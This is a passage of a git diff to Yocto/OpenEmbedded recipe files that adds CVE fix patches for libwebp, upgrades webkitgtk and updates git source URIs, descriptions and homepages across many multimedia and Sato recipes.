++  assert(!dec->incremental_ || (br->eos_ && src < src_last) || src >= src_last);
++  if (dec->incremental_ && br->eos_ && src < src_last) {
+     RestoreState(dec);
+-  } else if (!br->eos_) {
++  } else if ((dec->incremental_ && src >= src_last) || !br->eos_) {
+     // Process the remaining rows corresponding to last row-block.
+     if (process_func != NULL) {
+       process_func(dec, row > last_row ? last_row : row);
+--
+2.40.0
diff --git a/meta/recipes-multimedia/webp/libwebp_1.1.0.bb b/meta/recipes-multimedia/webp/libwebp_1.1.0.bb
index 68e5ae2b3c..88c36cb76c 100644
--- a/meta/recipes-multimedia/webp/libwebp_1.1.0.bb
+++ b/meta/recipes-multimedia/webp/libwebp_1.1.0.bb
@@ -19,6 +19,12 @@ SRC_URI[sha256sum] = "98a052268cc4d5ece27f76572a7f50293f439c17a98e67c4ea0c7ed6f5
 
 UPSTREAM_CHECK_URI = "http://downloads.webmproject.org/releases/webp/index.html"
 
+SRC_URI += " \
+    file://CVE-2023-1999.patch \
+    file://CVE-2023-4863-0001.patch \
+    file://CVE-2023-4863-0002.patch \
+"
+
 EXTRA_OECONF = " \
     --disable-wic \
     --enable-libwebpmux \
diff --git a/meta/recipes-multimedia/x264/x264_git.bb b/meta/recipes-multimedia/x264/x264_git.bb
index 39429a8809..6789646833 100644
--- a/meta/recipes-multimedia/x264/x264_git.bb
+++ b/meta/recipes-multimedia/x264/x264_git.bb
@@ -8,7 +8,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=94d55d512a9ba36caa9b7df079bae19f"
 
 DEPENDS = "nasm-native"
 
-SRC_URI = "git://github.com/mirror/x264;branch=stable \
+SRC_URI = "git://github.com/mirror/x264;branch=stable;protocol=https \
            file://don-t-default-to-cortex-a9-with-neon.patch \
            file://Fix-X32-build-by-disabling-asm.patch \
            "
diff --git a/meta/recipes-rt/rt-tests/rt-tests.inc b/meta/recipes-rt/rt-tests/rt-tests.inc
index 3ac39d90c3..29ebe2d361 100644
--- a/meta/recipes-rt/rt-tests/rt-tests.inc
+++ b/meta/recipes-rt/rt-tests/rt-tests.inc
@@ -2,7 +2,7 @@
 SRCREV = "dff174f994f547a5785d32454865f140daacb0f5"
 PE = "1"
 
-SRC_URI = "git://git.kernel.org/pub/scm/utils/rt-tests/rt-tests.git"
+SRC_URI = "git://git.kernel.org/pub/scm/utils/rt-tests/rt-tests.git;branch=main"
 # 1.2 to 1.5 seem to be development versions
 UPSTREAM_CHECK_GITTAGREGEX = "v(?P<pver>(?!1\.[2-6])(\d+(\.\d+)+))"
 
diff --git a/meta/recipes-rt/rt-tests/rt-tests_1.1.bb b/meta/recipes-rt/rt-tests/rt-tests_1.1.bb
index dad252b4ed..1db86b5067 100644
--- a/meta/recipes-rt/rt-tests/rt-tests_1.1.bb
+++ b/meta/recipes-rt/rt-tests/rt-tests_1.1.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Real-Time preemption testcases"
-HOMEPAGE = "https://rt.wiki.kernel.org/index.php/Cyclictest"
+HOMEPAGE = "https://wiki.linuxfoundation.org/realtime/documentation/start"
+DESCRIPTION = "The main aim of the PREEMPT_RT patch is to minimize the amount of kernel code that is non-preemptible Therefore several substitution mechanisms and new mechanisms are implemented."
 SECTION = "tests"
 DEPENDS = "linux-libc-headers virtual/libc"
 LICENSE = "GPLv2 & GPLv2+"
diff --git a/meta/recipes-sato/images/core-image-sato-dev.bb b/meta/recipes-sato/images/core-image-sato-dev.bb
index 7fa69d0997..f45a83273c 100644
--- a/meta/recipes-sato/images/core-image-sato-dev.bb
+++ b/meta/recipes-sato/images/core-image-sato-dev.bb
@@ -3,5 +3,6 @@ require core-image-sato.bb
 DESCRIPTION = "Image with Sato for development work. It includes everything \
 within core-image-sato plus a native toolchain, application development and \
 testing libraries, profiling and debug symbols."
+HOMEPAGE = "https://www.yoctoproject.org/"
 
 IMAGE_FEATURES += "dev-pkgs"
diff --git a/meta/recipes-sato/images/core-image-sato-ptest-fast.bb b/meta/recipes-sato/images/core-image-sato-ptest-fast.bb
index 3641217306..d37ad00cf8 100644
--- a/meta/recipes-sato/images/core-image-sato-ptest-fast.bb
+++ b/meta/recipes-sato/images/core-image-sato-ptest-fast.bb
@@ -1,9 +1,13 @@
+inherit features_check
+REQUIRED_DISTRO_FEATURES = "ptest"
+
 require core-image-sato-sdk.bb
 require conf/distro/include/ptest-packagelists.inc
 
 IMAGE_INSTALL += "${PTESTS_FAST}"
 
 DESCRIPTION += "Also includes ptest packages with fast execution times to allow for more automated QA."
+HOMEPAGE = "https://www.yoctoproject.org/"
 
 # This image is sufficiently large (~1.8GB) that it can't actually fit in a live
 # image (which has a 4GB limit), so nullify the overhead factor (1.3x out of the
diff --git a/meta/recipes-sato/images/core-image-sato-sdk-ptest.bb b/meta/recipes-sato/images/core-image-sato-sdk-ptest.bb
index bf749acd79..eea89a5d6c 100644
--- a/meta/recipes-sato/images/core-image-sato-sdk-ptest.bb
+++ b/meta/recipes-sato/images/core-image-sato-sdk-ptest.bb
@@ -1,7 +1,11 @@
+inherit features_check
+REQUIRED_DISTRO_FEATURES = "ptest"
+
 require core-image-sato-sdk.bb
 require conf/distro/include/ptest-packagelists.inc
 
 DESCRIPTION += "Also includes ptest packages."
+HOMEPAGE = "https://www.yoctoproject.org/"
 
 PROVIDES += "core-image-sato-ptest"
 
diff --git a/meta/recipes-sato/images/core-image-sato-sdk.bb b/meta/recipes-sato/images/core-image-sato-sdk.bb
index d7cc52b52b..b52de0def0 100644
--- a/meta/recipes-sato/images/core-image-sato-sdk.bb
+++ b/meta/recipes-sato/images/core-image-sato-sdk.bb
@@ -3,6 +3,7 @@ require core-image-sato.bb
 DESCRIPTION = "Image with Sato support that includes everything within \
 core-image-sato plus meta-toolchain, development headers and libraries to \
 form a standalone SDK."
+HOMEPAGE = "https://www.yoctoproject.org/"
 
 IMAGE_FEATURES += "dev-pkgs tools-sdk \
 	tools-debug eclipse-debug tools-profile tools-testapps debug-tweaks ssh-server-openssh"
diff --git a/meta/recipes-sato/images/core-image-sato.bb b/meta/recipes-sato/images/core-image-sato.bb
index 673106eb6d..300d8e0d43 100644
--- a/meta/recipes-sato/images/core-image-sato.bb
+++ b/meta/recipes-sato/images/core-image-sato.bb
@@ -1,6 +1,7 @@
 DESCRIPTION = "Image with Sato, a mobile environment and visual style for \
 mobile devices. The image supports X11 with a Sato theme, Pimlico \
 applications, and contains terminal, editor, and file manager."
+HOMEPAGE = "https://www.yoctoproject.org/"
 
 IMAGE_FEATURES += "splash package-management x11-base x11-sato ssh-server-dropbear hwcodecs"
 
@@ -12,4 +13,5 @@ TOOLCHAIN_HOST_TASK_append = " nativesdk-intltool nativesdk-glib-2.0"
 TOOLCHAIN_HOST_TASK_remove_task-populate-sdk-ext = " nativesdk-intltool nativesdk-glib-2.0"
 
 QB_MEM = '${@bb.utils.contains("DISTRO_FEATURES", "opengl", "-m 512", "-m 256", d)}'
+QB_MEM_qemuarmv5 = "-m 256"
 QB_MEM_qemumips = "-m 256"
diff --git a/meta/recipes-sato/l3afpad/l3afpad_git.bb b/meta/recipes-sato/l3afpad/l3afpad_git.bb
index 6fdcc3e392..4d5d299d47 100644
--- a/meta/recipes-sato/l3afpad/l3afpad_git.bb
+++ b/meta/recipes-sato/l3afpad/l3afpad_git.bb
@@ -1,4 +1,8 @@
 SUMMARY = "Simple GTK+ Text Editor"
+DESCRIPTION = "L3afpad is a simple GTK+ text editor that emphasizes simplicity. As development \
+focuses on keeping weight down to a minimum, only the most essential features \
+are implemented in the editor. L3afpad is simple to use, is easily compiled, \
+requires few libraries, and starts up quickly."
 HOMEPAGE = "https://github.com/stevenhoneyman/l3afpad"
 
 # Note that COPYING seems to mistakenly contain LGPLv2.1.
@@ -12,7 +16,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c \
 DEPENDS = "gtk+3 intltool-native gettext-native"
 
 PV = "0.8.18.1.11+git${SRCPV}"
-SRC_URI = "git://github.com/stevenhoneyman/l3afpad.git"
+SRC_URI = "git://github.com/stevenhoneyman/l3afpad.git;branch=master;protocol=https"
 SRCREV ="3cdccdc9505643e50f8208171d9eee5de11a42ff"
 
 S = "${WORKDIR}/git"
diff --git a/meta/recipes-sato/matchbox-config-gtk/matchbox-config-gtk_0.2.bb b/meta/recipes-sato/matchbox-config-gtk/matchbox-config-gtk_0.2.bb
index 547e851c15..5733a36b12 100644
--- a/meta/recipes-sato/matchbox-config-gtk/matchbox-config-gtk_0.2.bb
+++ b/meta/recipes-sato/matchbox-config-gtk/matchbox-config-gtk_0.2.bb
@@ -11,7 +11,7 @@ RDEPENDS_${PN} = "settings-daemon"
 
 # SRCREV tagged 0.2
 SRCREV = "ef2192ce98d9374ffdad5f78544c3f8f353c16aa"
-SRC_URI = "git://git.yoctoproject.org/${BPN} \
+SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master \
            file://no-handed.patch"
 UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>(\d+(\.\d+)+))"
 
diff --git a/meta/recipes-sato/matchbox-desktop/matchbox-desktop_2.2.bb b/meta/recipes-sato/matchbox-desktop/matchbox-desktop_2.2.bb
index 5c23e85202..2a2eb24f57 100644
--- a/meta/recipes-sato/matchbox-desktop/matchbox-desktop_2.2.bb
+++ b/meta/recipes-sato/matchbox-desktop/matchbox-desktop_2.2.bb
@@ -1,4 +1,5 @@
 SUMMARY = "Matchbox Window Manager Desktop"
+DESCRIPTION = "A lightweight windows manager for embedded systems. It uses the desktop background to provide an application launcher and allows modules to be loaded for additional functionality."
 HOMEPAGE = "http://matchbox-project.org/"
 BUGTRACKER = "http://bugzilla.yoctoproject.org/"
 
@@ -12,7 +13,7 @@ SECTION = "x11/wm"
 
 # SRCREV tagged 2.2
 SRCREV = "6bc67d09da4147e5552fe30011a05a2c59d2f777"
-SRC_URI = "git://git.yoctoproject.org/${BPN}-2 \
+SRC_URI = "git://git.yoctoproject.org/${BPN}-2;branch=master \
            file://vfolders/* \
            "
 
diff --git a/meta/recipes-sato/matchbox-keyboard/matchbox-keyboard_0.1.1.bb b/meta/recipes-sato/matchbox-keyboard/matchbox-keyboard_0.1.1.bb
index dfc7fbad57..49e37bd77c 100644
--- a/meta/recipes-sato/matchbox-keyboard/matchbox-keyboard_0.1.1.bb
+++ b/meta/recipes-sato/matchbox-keyboard/matchbox-keyboard_0.1.1.bb
@@ -1,4 +1,5 @@
 SUMMARY = "Matchbox virtual keyboard for X11"
+DESCRIPTION = "An on screen 'virtual' or 'software' keyboard."
 HOMEPAGE = "http://matchbox-project.org"
 BUGTRACKER = "http://bugzilla.yoctoproject.org/"
 SECTION = "x11"
diff --git a/meta/recipes-sato/matchbox-panel-2/matchbox-panel-2_2.11.bb b/meta/recipes-sato/matchbox-panel-2/matchbox-panel-2_2.11.bb
index 2e6f5b7085..54fe578cd3 100644
--- a/meta/recipes-sato/matchbox-panel-2/matchbox-panel-2_2.11.bb
+++ b/meta/recipes-sato/matchbox-panel-2/matchbox-panel-2_2.11.bb
@@ -1,4 +1,6 @@
 SUMMARY = "Simple GTK+ based panel for handheld devices"
+DESCRIPTION = "A flexible always present 'window bar' for holding application \
+launchers and small 'applet' style applications"
 HOMEPAGE = "http://matchbox-project.org"
 BUGTRACKER = "http://bugzilla.yoctoproject.org/"
 
@@ -21,7 +23,7 @@ RPROVIDES_${PN} = "matchbox-panel"
 RREPLACES_${PN} = "matchbox-panel"
 RCONFLICTS_${PN} = "matchbox-panel"
 
-SRC_URI = "git://git.yoctoproject.org/${BPN} \
+SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master \
            file://0001-applets-systray-Allow-icons-to-be-smaller.patch \
            "
 
diff --git a/meta/recipes-sato/matchbox-terminal/matchbox-terminal_0.2.bb b/meta/recipes-sato/matchbox-terminal/matchbox-terminal_0.2.bb
index 9f00281dde..e2e81c2905 100644
--- a/meta/recipes-sato/matchbox-terminal/matchbox-terminal_0.2.bb
+++ b/meta/recipes-sato/matchbox-terminal/matchbox-terminal_0.2.bb
@@ -11,7 +11,7 @@ SECTION = "x11/utils"
 
 #SRCREV tagged 0.2
 SRCREV = "161276d0f5d1be8187010fd0d9581a6feca70ea5"
-SRC_URI = "git://git.yoctoproject.org/${BPN}"
+SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master"
 UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>(\d+(\.\d+)+))"
 
 S = "${WORKDIR}/git"
diff --git a/meta/recipes-sato/matchbox-theme-sato/matchbox-theme-sato_0.2.bb b/meta/recipes-sato/matchbox-theme-sato/matchbox-theme-sato_0.2.bb
index 7a043d3447..bc4024736f 100644
--- a/meta/recipes-sato/matchbox-theme-sato/matchbox-theme-sato_0.2.bb
+++ b/meta/recipes-sato/matchbox-theme-sato/matchbox-theme-sato_0.2.bb
@@ -2,7 +2,7 @@ require matchbox-theme-sato.inc
 
 # SRCREV tagged 0.2
 SRCREV = "df085ba9cdaeaf2956890b0e29d7ea1779bf6c78"
-SRC_URI = "git://git.yoctoproject.org/matchbox-sato"
+SRC_URI = "git://git.yoctoproject.org/matchbox-sato;branch=master"
 UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>(\d+(\.\d+)+))"
 
 S = "${WORKDIR}/git"
diff --git a/meta/recipes-sato/packagegroups/packagegroup-core-x11-sato.bb b/meta/recipes-sato/packagegroups/packagegroup-core-x11-sato.bb
index ed3f1a69a1..25725e078d 100644
--- a/meta/recipes-sato/packagegroups/packagegroup-core-x11-sato.bb
+++ b/meta/recipes-sato/packagegroups/packagegroup-core-x11-sato.bb
@@ -3,6 +3,8 @@
 #
 
 SUMMARY = "Sato desktop"
+DESCRIPTION = "Packagegroups provide a convenient mechanism of bundling a collection of packages."
+HOMEPAGE = "https://www.yoctoproject.org/"
 PR = "r33"
 
 PACKAGE_ARCH = "${MACHINE_ARCH}"
diff --git a/meta/recipes-sato/pcmanfm/pcmanfm_1.3.1.bb b/meta/recipes-sato/pcmanfm/pcmanfm_1.3.1.bb
index 7885e0abae..153fbeb0b7 100644
--- a/meta/recipes-sato/pcmanfm/pcmanfm_1.3.1.bb
+++ b/meta/recipes-sato/pcmanfm/pcmanfm_1.3.1.bb
@@ -1,4 +1,5 @@
 SUMMARY = "Fast lightweight tabbed filemanager"
+DESCRIPTION = "A free file manager application and the standard file manager of LXDE."
 HOMEPAGE = "http://pcmanfm.sourceforge.net/"
 
 LICENSE = "GPLv2 & GPLv2+ & LGPLv2.1+"
diff --git a/meta/recipes-sato/puzzles/puzzles_git.bb b/meta/recipes-sato/puzzles/puzzles_git.bb
index 41b78d6fe1..3ee441998d 100644
--- a/meta/recipes-sato/puzzles/puzzles_git.bb
+++ b/meta/recipes-sato/puzzles/puzzles_git.bb
@@ -1,4 +1,5 @@
 SUMMARY = "Simon Tatham's Portable Puzzle Collection"
+DESCRIPTION = "Collection of small computer programs which implement one-player puzzle games."
 HOMEPAGE = "http://www.chiark.greenend.org.uk/~sgtatham/puzzles/"
 LICENSE = "MIT"
 LIC_FILES_CHKSUM = "file://LICENCE;md5=6099f4981f9461d7f411091e69a7f07a"
@@ -8,7 +9,7 @@ DEPENDS = "libxt"
 # The libxt requires x11 in DISTRO_FEATURES
 REQUIRED_DISTRO_FEATURES = "x11"
 
-SRC_URI = "git://git.tartarus.org/simon/puzzles.git \
+SRC_URI = "git://git.tartarus.org/simon/puzzles.git;branch=main \
            file://fix-compiling-failure-with-option-g-O.patch \
            file://0001-palisade-Fix-warnings-with-clang-on-arm.patch \
            file://0001-Use-Wno-error-format-overflow-if-the-compiler-suppor.patch \
diff --git a/meta/recipes-sato/rxvt-unicode/rxvt-unicode.inc b/meta/recipes-sato/rxvt-unicode/rxvt-unicode.inc
index b568f04580..0e5bcbe480 100644
--- a/meta/recipes-sato/rxvt-unicode/rxvt-unicode.inc
+++ b/meta/recipes-sato/rxvt-unicode/rxvt-unicode.inc
@@ -5,6 +5,7 @@ terminal emulator rxvt, modified to store text in Unicode \
 (either UCS-2 or UCS-4) and to use locale-correct input and \
 output. It also supports mixing multiple fonts at the \
 same time, including Xft fonts."
+HOMEPAGE = "https://rxvt.org/"
 DEPENDS = "virtual/libx11 libxt libxft gdk-pixbuf libxmu"
 
 SRC_URI = "http://dist.schmorp.de/rxvt-unicode/Attic/rxvt-unicode-${PV}.tar.bz2 \
diff --git a/meta/recipes-sato/rxvt-unicode/rxvt-unicode/0001-libev-remove-deprecated-throw-specification.patch b/meta/recipes-sato/rxvt-unicode/rxvt-unicode/0001-libev-remove-deprecated-throw-specification.patch
new file mode 100644
index 0000000000..f10dca09d6
--- /dev/null
+++ b/meta/recipes-sato/rxvt-unicode/rxvt-unicode/0001-libev-remove-deprecated-throw-specification.patch
@@ -0,0 +1,30 @@
+From 9a8f1d73e7b7e183768a8379ef32429a84f0e5c2 Mon Sep 17 00:00:00 2001
+From: Khem Raj <raj.khem@gmail.com>
+Date: Fri, 26 Feb 2021 18:11:56 -0800
+Subject: [PATCH] libev: remove deprecated throw specification
+
+removes the throw specifications that are deprecated since C++11:
+warning: dynamic exception specifications are deprecated in C++11 [-Wdeprecated]
+
+Upstream-Status: Pending
+Signed-off-by: Khem Raj <raj.khem@gmail.com>
+---
+ libev/ev++.h | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/libev/ev++.h b/libev/ev++.h
+index 4f0a36a..85ddf44 100644
+--- a/libev/ev++.h
++++ b/libev/ev++.h
+@@ -376,7 +376,7 @@ namespace ev {
+ 
+   struct default_loop : loop_ref
+   {
+-    default_loop (unsigned int flags = AUTO) throw (bad_loop)
++    default_loop (unsigned int flags = AUTO)
+ #if EV_MULTIPLICITY
+     : loop_ref (ev_default_loop (flags))
+ #endif
+-- 
+2.30.1
+
diff --git a/meta/recipes-sato/rxvt-unicode/rxvt-unicode_9.22.bb b/meta/recipes-sato/rxvt-unicode/rxvt-unicode_9.22.bb
index bfa8a614df..283e8d7751 100644
--- a/meta/recipes-sato/rxvt-unicode/rxvt-unicode_9.22.bb
+++ b/meta/recipes-sato/rxvt-unicode/rxvt-unicode_9.22.bb
@@ -4,5 +4,7 @@ LICENSE = "GPLv3"
 LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504 \
                     file://src/main.C;beginline=1;endline=31;md5=d3600d7ee1062667fcd1193fbe6485f6"
 
-SRC_URI[md5sum] = "93782dec27494eb079467dacf6e48185"
+SRC_URI += "file://0001-libev-remove-deprecated-throw-specification.patch"
+
 SRC_URI[sha256sum] = "e94628e9bcfa0adb1115d83649f898d6edb4baced44f5d5b769c2eeb8b95addd"
+
diff --git a/meta/recipes-sato/sato-screenshot/sato-screenshot_0.3.bb b/meta/recipes-sato/sato-screenshot/sato-screenshot_0.3.bb
index 2b1f513f1c..7e7612253d 100644
--- a/meta/recipes-sato/sato-screenshot/sato-screenshot_0.3.bb
+++ b/meta/recipes-sato/sato-screenshot/sato-screenshot_0.3.bb
@@ -11,7 +11,7 @@ DEPENDS = "matchbox-panel-2 gtk+3"
 
 # SRCREV tagged 0.3
 SRCREV = "9250fa5a012d84ff45984e8c4345ee7635227756"
-SRC_URI = "git://git.yoctoproject.org/screenshot"
+SRC_URI = "git://git.yoctoproject.org/screenshot;branch=master"
 UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>(\d+(\.\d+)+))"
 
 S = "${WORKDIR}/git"
diff --git a/meta/recipes-sato/settings-daemon/settings-daemon_0.0.2.bb b/meta/recipes-sato/settings-daemon/settings-daemon_0.0.2.bb
index d01177f9b9..19c4a73dc3 100644
--- a/meta/recipes-sato/settings-daemon/settings-daemon_0.0.2.bb
+++ b/meta/recipes-sato/settings-daemon/settings-daemon_0.0.2.bb
@@ -9,7 +9,7 @@ SECTION = "x11"
 
 # SRCREV tagged 0.0.2
 SRCREV = "b2e5da502f8c5ff75e9e6da771372ef8e40fd9a2"
-SRC_URI = "git://git.yoctoproject.org/xsettings-daemon \
+SRC_URI = "git://git.yoctoproject.org/xsettings-daemon;branch=master \
            file://addsoundkeys.patch \
            file://70settings-daemon.sh \
            "
diff --git a/meta/recipes-sato/webkit/webkitgtk/0001-MiniBrowser-Fix-reproduciblity.patch b/meta/recipes-sato/webkit/webkitgtk/0001-MiniBrowser-Fix-reproduciblity.patch
new file mode 100644
index 0000000000..528dec8c8b
--- /dev/null
+++ b/meta/recipes-sato/webkit/webkitgtk/0001-MiniBrowser-Fix-reproduciblity.patch
@@ -0,0 +1,31 @@
+From dcf9ae0dc0b4510eddbeeea09e11edfb123f95af Mon Sep 17 00:00:00 2001
+From: Khem Raj <raj.khem@gmail.com>
+Date: Sun, 2 May 2021 13:10:49 -0700
+Subject: [PATCH] MiniBrowser: Fix reproduciblity
+
+Do not emit references to source dir in generated sourcecode
+
+Upstream-Status: Submitted [https://bugs.webkit.org/show_bug.cgi?id=225283]
+Signed-off-by: Khem Raj <raj.khem@gmail.com>
+---
+ Tools/MiniBrowser/gtk/CMakeLists.txt | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/Tools/MiniBrowser/gtk/CMakeLists.txt b/Tools/MiniBrowser/gtk/CMakeLists.txt
+index 93b62521..482d3b00 100644
+--- a/Tools/MiniBrowser/gtk/CMakeLists.txt
++++ b/Tools/MiniBrowser/gtk/CMakeLists.txt
+@@ -48,8 +48,8 @@ add_custom_command(
+     OUTPUT ${DERIVED_SOURCES_MINIBROWSER_DIR}/BrowserMarshal.c
+            ${DERIVED_SOURCES_MINIBROWSER_DIR}/BrowserMarshal.h
+     MAIN_DEPENDENCY ${MINIBROWSER_DIR}/browser-marshal.list
+-    COMMAND glib-genmarshal --prefix=browser_marshal ${MINIBROWSER_DIR}/browser-marshal.list --body > ${DERIVED_SOURCES_MINIBROWSER_DIR}/BrowserMarshal.c
+-    COMMAND glib-genmarshal --prefix=browser_marshal ${MINIBROWSER_DIR}/browser-marshal.list --header > ${DERIVED_SOURCES_MINIBROWSER_DIR}/BrowserMarshal.h
++    COMMAND glib-genmarshal --prefix=browser_marshal ${MINIBROWSER_DIR}/browser-marshal.list --body --skip-source > ${DERIVED_SOURCES_MINIBROWSER_DIR}/BrowserMarshal.c
++    COMMAND glib-genmarshal --prefix=browser_marshal ${MINIBROWSER_DIR}/browser-marshal.list --header --skip-source > ${DERIVED_SOURCES_MINIBROWSER_DIR}/BrowserMarshal.h
+     VERBATIM)
+ 
+ if (DEVELOPER_MODE)
+-- 
+2.31.1
+
diff --git a/meta/recipes-sato/webkit/webkitgtk/0001-clang-11-fix-build-errors-due-to-WWc-11-narrowing.patch b/meta/recipes-sato/webkit/webkitgtk/0001-clang-11-fix-build-errors-due-to-WWc-11-narrowing.patch
new file mode 100644
index 0000000000..d8bb8efb88
--- /dev/null
+++ b/meta/recipes-sato/webkit/webkitgtk/0001-clang-11-fix-build-errors-due-to-WWc-11-narrowing.patch
@@ -0,0 +1,66 @@
+From cb929f59b527fe890376e47613dfe1434a320bc0 Mon Sep 17 00:00:00 2001
+From: Khem Raj <raj.khem@gmail.com>
+Date: Tue, 11 Aug 2020 15:44:48 -0700
+Subject: [PATCH] [clang 11] fix build errors due to -WWc++11-narrowing
+
+https://bugs.webkit.org/show_bug.cgi?id=211193
+
+Reviewed by Adrian Perez de Castro.
+
+Fixes the following errors,
+
+Source/WebCore/html/MediaElementSession.cpp:1059:9: error: type 'WebCore::RenderMedia *' cannot be narrowed to 'bool' in initializer list [-Wc++11-narrowing]
+m_element.renderer(),
+^~~~~~~~~~~~~~~~~~~~
+
+Source/WebCore/style/StyleResolver.cpp:106:55: error: type 'const char [4]' cannot be narrowed to 'bool' in initializer list [-Wc++11-narrowing]
+m_mediaQueryEvaluator = MediaQueryEvaluator { "all" };
+                                              ^~~~~
+Source/WebCore/style/StyleResolver.cpp:106:55: note: insert an explicit cast to silence this issue
+m_mediaQueryEvaluator = MediaQueryEvaluator { "all" };
+                                              ^~~~~
+                                              static_cast<bool>( )
+
+* html/HTMLMediaElement.h:
+(WebCore::HTMLMediaElement::hasRenderer const):
+MediaElementSession was implicitly casting a pointer to a bool,
+which is not allowed with modern Clang checks. Add a helper method
+to encapsulate the now required static_cast<bool>.
+* html/MediaElementSession.cpp: Use the new helper method to see
+if the HTMLMediaElement has an associated renderer.
+(WebCore::MediaElementSession::updateMediaUsageIfChanged):
+* style/StyleResolver.cpp: This was calling MediaQueryEvaluator {
+"all" }; and seemingly expecting to cast a const char[] to a bool,
+or maybe String? It's confusing because of the MediaQueryEvaluator
+API. If it was implicitly converting to bool then that could be
+unintentional. Such casts are not allowed either now. The
+MediaQueryEvaluator's default constructor says it returns true for
+"all", which appears to be the original intent of this call, so I
+replaced it with that.
+(WebCore::Style::Resolver::Resolver):
+
+git-svn-id: http://svn.webkit.org/repository/webkit/trunk@260951 268f45cc-cd09-0410-ab3c-d52691b4dbfc
+
+Upstream-Status: Backport [https://github.com/WebKit/webkit/commit/c3cf651016e4cdcb4350598d4a586821071f91bf.patch]
+
+Signed-off-by: Khem Raj <raj.khem@gmail.com>
+---
+ Source/WebCore/style/StyleResolver.cpp | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/Source/WebCore/style/StyleResolver.cpp b/Source/WebCore/style/StyleResolver.cpp
+index 8bf371a0..34580ddb 100644
+--- a/Source/WebCore/style/StyleResolver.cpp
++++ b/Source/WebCore/style/StyleResolver.cpp
+@@ -107,7 +107,7 @@ Resolver::Resolver(Document& document)
+     if (view)
+         m_mediaQueryEvaluator = MediaQueryEvaluator { view->mediaType() };
+     else
+-        m_mediaQueryEvaluator = MediaQueryEvaluator { "all" };
++        m_mediaQueryEvaluator = MediaQueryEvaluator { };
+ 
+     if (root) {
+         m_rootDefaultStyle = styleForElement(*root, m_document.renderStyle(), nullptr, RuleMatchingBehavior::MatchOnlyUserAgentRules).renderStyle;
+-- 
+2.28.0
+
diff --git a/meta/recipes-sato/webkit/webkitgtk/CVE-2020-13753.patch b/meta/recipes-sato/webkit/webkitgtk/CVE-2020-13753.patch
deleted file mode 100644
index d8504c2b36..0000000000
--- a/meta/recipes-sato/webkit/webkitgtk/CVE-2020-13753.patch
+++ /dev/null
@@ -1,15 +0,0 @@
-Upstream-Status: Backport [https://trac.webkit.org/changeset/262368/webkit?format=diff&new=262368]
-CVE: CVE-2020-13753
-Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
-
-Index: a/Source/WebKit/UIProcess/Launcher/glib/BubblewrapLauncher.cpp
-===================================================================
---- a/Source/WebKit/UIProcess/Launcher/glib/BubblewrapLauncher.cpp	(revision 262367)
-+++ b/Source/WebKit/UIProcess/Launcher/glib/BubblewrapLauncher.cpp	(revision 262368)
-@@ -642,5 +642,5 @@
-         int r;
-         if (rule.arg)
--            r = seccomp_rule_add(seccomp, SCMP_ACT_ERRNO(EPERM), scall, 1, rule.arg);
-+            r = seccomp_rule_add(seccomp, SCMP_ACT_ERRNO(EPERM), scall, 1, *rule.arg);
-         else
-             r = seccomp_rule_add(seccomp, SCMP_ACT_ERRNO(EPERM), scall, 0);
diff --git a/meta/recipes-sato/webkit/webkitgtk_2.28.2.bb b/meta/recipes-sato/webkit/webkitgtk_2.28.4.bb
index 9cfec83ec7..2e3f0aa682 100644
--- a/meta/recipes-sato/webkit/webkitgtk_2.28.2.bb
+++ b/meta/recipes-sato/webkit/webkitgtk_2.28.4.bb
@@ -19,10 +19,10 @@ SRC_URI = "https://www.webkitgtk.org/releases/${BPN}-${PV}.tar.xz \
            file://cross-compile.patch \
            file://0001-Fix-build-with-musl.patch \
            file://include_array.patch \
-           file://CVE-2020-13753.patch \
+           file://0001-clang-11-fix-build-errors-due-to-WWc-11-narrowing.patch \
+           file://0001-MiniBrowser-Fix-reproduciblity.patch \
            "
-SRC_URI[md5sum] = "ec0ef870ca37e3a5ebbead2f268a28ec"
-SRC_URI[sha256sum] = "b9d23525cfd8d22c37b5d964a9fe9a8ce7583042a2f8d3922e71e6bbc68c30bd"
+SRC_URI[sha256sum] = "821952e8c9303ed752f1fb1d4283f612c25249d00d705d2b79c2db1bc49c9464"
 
 inherit cmake pkgconfig gobject-introspection perlnative features_check upstream-version-is-even gtk-doc
 
@@ -131,3 +131,15 @@ GI_DATA_ENABLED_libc-musl_armv7ve = "False"
 
 # Can't be built with ccache
 CCACHE_DISABLE = "1"
+
+PACKAGE_PREPROCESS_FUNCS += "src_package_preprocess"
+src_package_preprocess () {
+        # Trim build paths from comments in generated sources to ensure reproducibility
+        sed -i -e "s,${WORKDIR},,g" \
+            ${B}/DerivedSources/webkit2gtk/webkit2/*.cpp \
+            ${B}/DerivedSources/ForwardingHeaders/JavaScriptCore/*.h \
+            ${B}/DerivedSources/JavaScriptCore/*.h \
+            ${B}/DerivedSources/JavaScriptCore/yarr/*.h \
+            ${B}/DerivedSources/MiniBrowser/*.c
+}
+
diff --git a/meta/recipes-sato/webkit/wpebackend-fdo_1.4.1.bb b/meta/recipes-sato/webkit/wpebackend-fdo_1.4.1.bb
index cd2f7fabda..165fc74dde 100644
--- a/meta/recipes-sato/webkit/wpebackend-fdo_1.4.1.bb
+++ b/meta/recipes-sato/webkit/wpebackend-fdo_1.4.1.bb
@@ -15,3 +15,6 @@ REQUIRED_DISTRO_FEATURES = "opengl"
 SRC_URI = "https://wpewebkit.org/releases/${BPN}-${PV}.tar.xz"
 SRC_URI[sha256sum] = "6249a0b7cbfa662206a8d2fa24e2c574e75c681ad0e93468091f1dc68ddb299d"
 
+FILES_${PN} += "${libdir}/libWPEBackend-fdo-1.0.so"
+FILES_SOLIBSDEV = ""
+INSANE_SKIP_${PN} += "dev-so"
